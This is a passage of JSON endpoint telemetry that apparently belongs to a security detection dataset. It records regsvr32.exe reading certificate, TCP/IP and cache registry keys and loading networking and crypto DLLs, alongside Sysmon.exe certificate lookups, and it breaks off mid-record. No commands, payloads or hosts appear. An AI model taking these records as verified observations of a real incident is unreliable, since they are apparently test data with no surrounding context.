"process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT", - "registry_value": "ROOT", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT", - "registry_value": "ROOT", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot", - "registry_value": "AuthRoot", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root", - "registry_value": "Root", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root", - "registry_value": "Root", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\SmartCardRoot", - "registry_value": "SmartCardRoot", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\CA", - "registry_value": "CA", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\CA", - "registry_value": "CA", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA", - "registry_value": "CA", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA", - "registry_value": "CA", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root", - "registry_value": "Root", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA", - "registry_value": "CA", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - 
"process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Content", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Content\\CachePrefix", - "registry_value": "CachePrefix", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Cookies", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Cookies\\CachePrefix", - "registry_value": "CachePrefix", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\History", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\History\\CachePrefix", - "registry_value": "CachePrefix", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "dnsapi.dll", - "image_path": "C:\\Windows\\System32\\dnsapi.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573238230000, - "unique_pid": 
"{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "rasadhlp.dll", - "image_path": "C:\\Windows\\System32\\rasadhlp.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573238230000, - 
"unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573238400000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", 
- "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wininet.dll", - "image_path": "C:\\Windows\\System32\\wininet.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", 
- "timestamp": 131883573237930000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "FWPUCLNT.DLL", - "image_path": "C:\\Windows\\System32\\FWPUCLNT.DLL", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "schannel.dll", - "image_path": "C:\\Windows\\System32\\schannel.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573238700016, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders", - "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL", - "registry_value": "SCHANNEL", - "timestamp": 131883573238700016, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "mskeyprotect.dll", - "image_path": "C:\\Windows\\System32\\mskeyprotect.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "ncrypt.dll", - "image_path": "C:\\Windows\\System32\\ncrypt.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "ntasn1.dll", - "image_path": "C:\\Windows\\System32\\ntasn1.dll", - "pid": 2012, - "process_name": 
"regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "cryptnet.dll", - "image_path": "C:\\Windows\\System32\\cryptnet.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", 
- "registry_value": "LanguageList", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573238869984, - "unique_pid": 